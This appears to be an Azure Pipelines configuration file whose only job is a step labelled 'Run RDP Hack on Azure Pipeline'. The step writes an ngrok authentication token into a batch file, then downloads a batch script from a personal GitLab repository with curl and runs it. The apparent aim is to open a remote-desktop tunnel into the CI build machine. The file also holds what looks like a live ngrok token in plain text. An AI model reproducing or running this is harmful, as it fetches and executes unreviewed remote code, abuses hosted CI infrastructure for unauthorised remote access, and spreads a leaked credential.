jobs:
- job: Windows_2019_Azure_RDP
  pool:
    vmImage: windows-latest
  steps:
   - checkout: none
   - script: |
       echo ngrok authtoken "20XRiTFm2uqs0AG704eXmAOzBcd_4RzdNZLS4dH2KCY7QjJvh" > NGROK.bat
       curl -s -O https://gitlab.com/reza93120/rddp/-/raw/master/AzureNgrokAutoRegion.bat
       AzureNgrokAutoRegion.bat
     displayName: 'Run RDP Hack on Azure Pipeline'
